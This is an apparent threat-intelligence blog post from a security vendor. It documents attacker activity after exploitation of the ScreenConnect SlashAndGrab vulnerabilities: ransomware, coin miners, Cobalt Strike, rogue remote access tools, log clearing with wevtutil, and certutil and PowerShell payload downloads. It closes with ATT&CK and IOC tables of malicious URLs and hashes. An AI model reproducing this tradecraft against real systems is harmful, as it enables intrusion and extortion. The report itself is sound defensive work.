SlashAndGrab ScreenConnect PostExploitation in the Wild CVE20241709 CVE20241708 Huntress

pTable of Contents ppSince February 19 Huntress has been sharing technical details of the ScreenConnect vulnerability were calling SlashAndGrab In previous posts we shared the details of this vulnerability its exploit and shared detection guidanceppppIn this article weve collected and curated threat actor activity fresh from the Huntress Security Operations Center SOC where our team has detected and kicked out active adversaries leveraging ScreenConnect access for postexploitation tradecraftppThe adversaries taking advantage of this vulnerability have been VERY busy There is a lot to cover here so buckle up and enjoy some tradecraft ppA number of adversaries leveraged their newly illgotten ScreenConnect gains to deploy ransomware ppWith the impressive joint international takedown efforts to disrupt the LockBit ransomware group many are asking how LockBit is still relevant The LockBit deployments that weve seen are invoked with an encryptor that looks to be compiled around September 13 2022which is the same timeline as the leaked LockBit 30 builder in the past One observed filename is classic highlightLB3exehighlight which again matches the canned and publicly leaked builderppWe believe this is an important distinction While the malware deployed appears associated with LockBit there is no evidence weve seen suggesting the joint international takedown efforts are anything short of a landmark milestone to disrupt one of the largest and most active ransomware groups in the worldppWeve included the resulting ransom note associated with the above executable ppWe observed other ransomware attempts like highlightupdexehighlight and highlightsvchostexehighlight that Microsoft Defender consistently neutralizedppWe also observed adversaries leverage certutil downloaded ransomware highlightMSIhighlight payloads which they also made persistent via startup foldersppThe ransom note from the threat actor who deployed the MSI has been included as well ppRansomware actors also tried to remove event logs via highlightwevtutilexe clhighlight to frustrate investigators analysis at a later time Fortunately Huntress Managed EDR is far too perceptive to entertain adversarial frustration  ppAdversaries EnumeratingppThere was a particular adversary using highlight1856258132highlight executing a script on compromised systems across multiple unique victim networks The intent of the script was to identify which of their compromised systems with the highest privilegesWe believe this demonstrates the scale with which threat actors are abusing this vulnerability as they are working to automate their understanding of where to take additional postcompromise actions moving forward ppSomewhat disappointing for a lack of originality a significant number of adversaries used their ScreenConnect access to deploy cryptocurrency coin minersppThere was a particularly entertaining attempt to masquerade a coinminer as a legitimate SentinelOne file ppWe also observed adversaries downloading and using a xmrig cryptominer with further details below ppAdversaries seemed to commonly install additional legitimate remote access tools likely as an attempt to remain persistent even once the ScreenConnect fiasco has been cleared up ppAn adversary we observed installed the Simple Help RMM from their ScreenConnect initial accessppWe observed the Simple Help RMM agent deployed in the following directoriesppWe also observed a configuration file dropped to highlightCProgramDataJWrapperRemote AccessJWAppsSharedConfigserviceconfigxmlhighlight which revealed it was configured to communicate to the public IPv4 highlight919224071highlightppThe user highlightoldadminhighlight was observed being used running similar commands across multiple unique victim organizationsppThis threat actor leveraged their ScreenConnect access to download and run an SSH backdoor seemingly to facilitate an RDP connection ppWe also observed an adversary do something quite interesting with Google Chromes Remote Desktop They pulled the installer directly from Google infrastructure which stores it as a serviceno doubt in the hopes they could persistently and remotely access the environment via a second GUI remote access tool we enjoy crushing hacker hopes here at Huntress  ppA common tradecraft denominator between the adversaries we observed involved them downloading further tools and payloadsppFor example an adversary leveraged PowerShells highlightInvokeWebRequesthighlight highlightiwrhighlight to call on additional payloads for their SSH persistent tunnelppWe also observed an adversary download the SimpleHelp RMM via curl and rename the executables to pngs in an attempt to evade detection spoiler they did not evade detection ppThere was also this straightforward PowerShell downloading activity However the file was deleted and their infrastructure was offline meaning the files intent had not been determined ppWe also observed adversaries leverage LOLBINs like certutil to download their payloads likely in an attempt to fly under the radarppSome adversaries maliciously modified the AV on the host before downloading their payloads In this specific example highlightsvchostexehighlight was deleted before analysis could be conducted ppAdversaries also used their ScreenConnect sessions to reach out and download Cobalt Strike beacons from their external infrastructure Specifically this threat actor saved their beacon as a highlightPDFhighlight on a web server renaming it to a highlightDAThighlight on the targeted machineppInterestingly we observed an adversary mass download cryptocurrency miners using the temporary file upload website highlighttransfershhighlightppExcerpt of the script full script in the Appendix ppUnsurprisingly many adversaries attempted to drop and run a Cobalt Strike beacon on the host ppIts also worth noting that Defender thwarted many of these attempts as seen in Figure 20ppIt was also common to see the same adversaries drop the earlier mentioned SentinelUI cryptocurrency miner and attempt a Cobalt Strike beacon which Windows Defender would neutralize ppAdversaries of course want to persist in an environment beyond their initial access methodand for good reason This ScreenConnect vulnerability had rapid mitigations suggested by Huntress and ConnectWise that would have undermined the adversarys access ppOur SOC observed a number of adversaries prioritize creating their own users once they landed on a machine using naming conventions that would attempt to fly under the radar as well as add these to highly privileged groupsppThe SOC also observed an adversary transfer a highlightCperflogsRunSchedulerTaskOnceps1highlight from the ScreenConnect compromised as confirmed from analysis of Windows Event Logs highlightApplicationevtx Event ID 0highlight ppThe script was in fact deleted but could be partially restored by taking the PowerShell Operational EVTX and running this script which restitched the script back together from its ScriptBlockId excerpt of script belowppThis would download a highlightdriverdllhighlight and leverage WMI Event Consumer PwSH persistence named highlightSystemCmrhighlightppThis incredibly interesting ScreenConnect exploit has enamored many of us at Huntress for the last few days but its a shame our adversaries didnt commit to pairing this new exploit with new tradecraftppIts worth driving this point home most of the postcompromise activities we have documented in this article arent novel original or outstanding Most threat actors simply dont know what to do beyond the same usual procedural tradecraft cybercriminals are rarely sophisticated and the infosec community can beat them togetherppAdversaries will default to their tried and true methods An experienced talented security team can neutralize most threat actors in the middle of their campaigns with ease We hope this article inspires your security mindset If you need any help monitoring for activity related to this vulnerability you can use Huntress free trialppIf youre interested in more come and check out the next episode of our Product Lab webinar where well be sharing even more technical details behind this threat and answer any questions from the communitypptabletheadtrth classtableheaderTacticthth classtableheaderTechniquethth classtableheaderDescriptionthtrtheadtbody classtablebodytr classtablerowtd classtablecell whiteInitial Accesstdtd classtablecell whiteT1190 Exploit PublicFacing Applicationtdtd classtablecell whiteAdversaries are leveraging a path traversal bug and auth bypass in ScreenConnect that allows them to create a privileged account for remote controltdtrtr classtablerowtd classtablecell whiteDiscoverytdtd classtablecell whiteT1087 Account Discoverytdtd classtablecell whiteAdversaries are attempting to discover privileged users by running a script across compromised systemstdtrtr classtablerowtd classtablecell whiteDefense Evasiontdtd classtablecell whiteT1562001 Disable or Modify Toolstdtd classtablecell whiteAdversaries are attempting to evade detection by adding exclusion paths to Windows Defender using PowerShelltdtrtr classtablerowtd classtablecell whiteDefense Evasiontdtd classtablecell whiteT1070001 Clear Windows Event Logstdtd classtablecell whiteRansomware actors attempt to remove event logs using wevtutilexe cl command to hinder forensic analysistdtrtr classtablerowtd classtablecell whiteExecutiontdtd classtablecell whiteT1059 Command and Scripting Interpreterbr T1059001 Powershellbr T1059003 Windows Command Shell tdtd classtablecell whiteAdversaries are using PowerShell and CMD to download and execute scripts from remote locations facilitating various activities such as cryptocurrency mining and remote accesstdtrtr classtablerowtd classtablecell whitePersistencetdtd classtablecell whiteT1547001 Boot or Logon Autostart Execution Registry Run Keys Startup Foldertdtd classtablecell whiteAdversaries stored their MSI ransomware payload in the Public startup foldertdtrtr classtablerowtd classtablecell whitePersistencetdtd classtablecell whiteT1136 Create Accounttdtd classtablecell whiteAdversaries created new users and in some instances added them to privileged groups tdtrtr classtablerowtd classtablecell whitePersistencetdtd classtablecell whiteT1053 Scheduled Tasktdtd classtablecell whiteAdversaries are creating scheduled tasks for their cryptominers and remote accesstdtrtr classtablerowtd classtablecell whitePersistencetdtd classtablecell whiteT1546003 Event Triggered Execution Windows Management Instrumentation Event Subscriptiontdtd classtablecell whiteAdversaries are modifying the registry to achieve persistence by adding WMI Event Consumerstdtrtr classtablerowtd classtablecell whitePersistencetdtd classtablecell whiteT1133 External Remote Servicestdtd classtablecell whiteAdversaries are compromising ScreenConnect instances deploying SSH tunnels Chrome remote desktops and alternate RMMs for evasive persistent remote accesstdtrtr classtablerowtd classtablecell whiteCommand and Controltdtd classtablecell whiteT1105 Ingress Tool Transfertdtd classtablecell whiteAdversaries are downloading files using curl certutil and InvokeWebRequesttdtrtr classtablerowtd classtablecell whiteCommand and Controltdtd classtablecell whiteT1572 Protocol Tunnelingtdtd classtablecell whiteAdversaries created SSH tunnels for communicationtdtrtr classtablerowtd classtablecell whiteImpacttdtd classtablecell whiteT1496 Resource Hijackingtdtd classtablecell whiteCryptocurrency miners are being deployed by adversariestdtrtr classtablerowtd classtablecell whiteImpacttdtd classtablecell whiteT1486 Data Encrypted for Impacttdtd classtablecell whiteAdversaries deployed ransomware via compromised ScreenConnecttdtrtr classtablerowtd classtablecell whiteSoftwaretdtd classtablecell whiteS0154 Cobalt Striketdtd classtablecell whiteAdversaries are leveraging Cobalt Strike beacons to achieve C2 connections to compromised ScreenConnect machines tdtrtbodytablepptabletheadtrth classtableheaderIoC Typethth classtableheaderIndicatorthth classtableheaderHashthtrtheadtbody classtablebodytr classtablerowtd classtablecell whiteRansomwaretdtd classtablecell whiteCWindowsTEMPScreenConnect22578818171LB3exetdtd classtablecell white78a11835b48bbe6a0127b777c0c3cc102e726205f67afefcd82f073e56489e49tdtrtr classtablerowtd classtablecell whiteRansomwaretdtd classtablecell whitehttp23261372258084msappdatamsi cmpyutdmsitdtd classtablecell white8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600tdtrtr classtablerowtd classtablecell whiteRansomwaretdtd classtablecell whiteUPXexetdtd classtablecell white2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438atdtrtr classtablerowtd classtablecell whiteRansomwaretdtd classtablecell whitesvchostexetdtd classtablecell whitea50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0tdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershGElU1LmvbSinjcetps1tdtd classtablecell whiteec49f5033374eb8f533e291111e1433e2da127f45857aebbbe614e711b3ca989tdtrtr classtablerowtd classtablecell whiteCobalt Striketdtd classtablecell whitehxxpminishwikigdcpdfCprogramdataupdatedattdtd classtablecell white0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6a7ebe65bf3fdd6fetdtrtr classtablerowtd classtablecell whiteCobalt Striketdtd classtablecell whiteCperflogsRunSchedulerTaskOnceps1tdtd classtablecell white6065fee2d0cb0dc7d0c0788e7e9424088e722dfcf9356d20844d7b2d75b20163tdtrtr classtablerowtd classtablecell whiteCobalt Striketdtd classtablecell whitecopyexetdtd classtablecell white81b4a649a42a157facede979828095ccddcdf6cec47e8a3156530e0c02e9625etdtrtr classtablerowtd classtablecell whiteGoogle Chrome Remote Desktoptdtd classtablecell whitehttpsdlgooglecomedgedlchromeremotedesktopchromeremotedesktophostmsiCProgramData1msitdtd classtablecell whitec47bfe3b3eccc86f87d2b6a38f0f39968f6147c2854f51f235454a54e2134265tdtrtr classtablerowtd classtablecell whiteSimpleHelp RMMtdtd classtablecell whitehttpscmcttcompubmediawysiwygsunpngCWindowsspsrvexetdtd classtablecell whitee8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2da729867935c793tdtrtr classtablerowtd classtablecell whiteSimpleHelp RMMtdtd classtablecell whitecmcttcompubmediawysiwyginvokepng tdtd classtablecell white37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab991aad5dd6a9c231btdtrtr classtablerowtd classtablecell whiteSimpleHelp RMMtdtd classtablecell whiteCUsersoldadminDocumentsMaxx Uptime remote connectionFilesagentexetdtd classtablecell whitea0fd0ceb95e775a48a95c00eab42fa5bb170f552005c38812fd03ab4cc14932etdtrtr classtablerowtd classtablecell whiteSimpleHelp RMMtdtd classtablecell whiteCProgramDataJWrapperRemote AccessJWAppsSharedConfigserviceconfigxmltdtd classtablecell white2e0df44dd75dbdbd70f1a777178ad8a1867cf0738525508b6120ba21f4505f47tdtrtr classtablerowtd classtablecell whiteSimpleHelp RMM IPv4tdtd classtablecell white919224071tdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteSSH Scripttdtd classtablecell whitedtdtd classtablecell white69c7fc246c4867f070e1a7b80c7c41574ee76ab54a8b543a1e0f20ce4a0d5cdetdtrtr classtablerowtd classtablecell whiteSSH Scripttdtd classtablecell whiteZziptdtd classtablecell whiteaa9f5ed1eede9aac6d07b0ba13b73185838b159006fa83ed45657d7f333a0efetdtrtr classtablerowtd classtablecell whiteBeacontdtd classtablecell whitedriverdlltdtd classtablecell white6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e70f6307aae21f9090tdtrtr classtablerowtd classtablecell whiteUnknowntdtd classtablecell white159651301464444svchostexeCWindowsTempsvchostexetdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehttp18523292328888SentinelUIexetdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershs27p8BcTxiconfig12jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershojw6aKoA4Aconfig11jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfersh8l4d5qR39oconfig9jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershxkIMWnocQHconfig8jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershDb5eUfqKP9config7jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershL1e30KShXPconfig6jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershw2Y0iuEKiYconfig5jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfersh6bkwRh4NXdconfig4jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershPRBRzMMEKCconfig3jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershRWSn6NLIr7config2jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershMRFibhy8fSconfig1jsontdtd classtablecell whitetdtrtr classtablerowtd classtablecell whiteCryptocurrency Minertdtd classtablecell whitehxxpstransfershFeDRSFU5XVconfigjsontdtd classtablecell whitetdtrtbodytableppContents of injectps1 Crypto Currency MinerppThank you to the following Huntress SOC analysts for their triage and reporting of the various adversarial activities included in this report Adrian Garcia Amelia Casley Chad Hudson Dani Dayal Christopher Dipo Rodipe Dray Agha Faith Stratton Herbie Zimmerman Izzy Spering Jai Minton John JB Brennan Jordan Sexton Josh Allman Mehtap Ozdemir Michael Elford Stephanie Fairless Susie Faulkner Tim KasperppSpecial thanks to Josh Allman and Dray Agha for further analysis and collecting and curating this blog ppppppppppppppppSubscribe today and youll be the first to know when new content hits the blogp